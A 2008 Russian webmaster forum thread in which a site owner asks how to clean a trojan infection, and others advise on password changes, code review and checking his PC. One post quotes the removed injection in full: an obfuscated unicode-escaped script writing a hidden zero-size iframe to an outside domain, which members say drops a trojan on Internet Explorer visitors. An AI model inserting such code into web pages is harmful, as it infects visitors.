форум вебмастероff на AlfaSpace.NET

Ubuntu и Linux |реактивный бесплатный хостинг | Киноклуб. ВСЁ БЕСПЛАТНО!
база знаний хостинга | правила форума

  Начало ° Ответить ° Статистика ° Опрос ° Регистрация ° Поиск ° FAQ °
Форум вебмастеров на AlfaSpace.NET / The Matrix Has You / Троян на сайте
Автор Сообщение
Александр
Леонидович

1040
# Дата: 26 Мар 2008 16:53


Есть сайт. На нём вот такая вот фигня (см. рис). ФТП доступ есть. Как это пофиксить лучше?[IMG]http://i025.radikal.ru/0803/e6/348a108fae4a.jpg [/IMG]

Александр
Леонидович

1040
# Дата: 26 Мар 2008 19:53


В admin.php и index.php нашёл (и вырезал)
<!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\ 
u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0
074\u0070\u003a\u002f\u002f\u0078\u002d\u0076\u0069\u0063\u0074\u006f\u0072\u007
9\u002e\u0072\u0075\u002f\u0066\u006f\u0072\u0075\u006d\u002f\u0069\u006e\u0064\
u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u0
03d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u003
0\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><!
-- c65 -->

Каспер уже не ругается. Но что нужно сделать ещё?

Константин
TorrentMaster

3449
# Дата: 26 Мар 2008 20:11


ФТП доступ есть.

В первую очередь проверить свою машину, если пароль от фтп на ней сохранен и там вдруг оказалась винда В 90% случаев именно так подобного рода вещи на сайты и попадают.

А вообще - менять пароль, вычитывать код - весь, можно попробовать из бекапа восстановить что-то если есть... все стандартно

Александр
Леонидович

1040
# Дата: 26 Мар 2008 21:48


Константин так я так и не понял как этот троян работае. Т е, вот он добавил код в скрипт. а сам он - это что? Бинарник? скрипт? или что? Хотелось бы знать как подчистить всё аккуратно.

Serg
Участник

1817
# Дата: 27 Мар 2008 09:00


Это обыкновенный закодированный яваскрипт.
Он, используя дыры безопасности в ИЕ, устанавливает на компы посетителей, юзающих осла, троян.
Обычно достаточно просто удалить код, история не повторяется. Но свой комп все же проверь на наличие гадости, хотя и вряд ли что-то найдешь.

Александр
Леонидович

1040
# Дата: 27 Мар 2008 12:23


Нащёл ещё 5 кусков кода. И всё на скриптах админ и логин
Спасибо за советы!

Ваш ответ

Quote  Bold Style  Italic Style  Underlined Style  URL Link  Email Link  Script AutoTab  Preformatted Text  Отменить *Что это?
... Запретить смайлы


Перед отправкой "нелатинского" текста проверьте кодировку броузера!
 » Логин  » Пароль 
 
Powered by miniBB forum software © 2001-2008
Powered by miniBB-gzipper. Original size:24398, gzipped size:8083

Mp3 Download || Webs Studio™ || Song's Lyrics
eXTReMe Tracker Rambler's Top100 Рейтинг@Mail.ru Форум ТвойWeb [Valid RSS]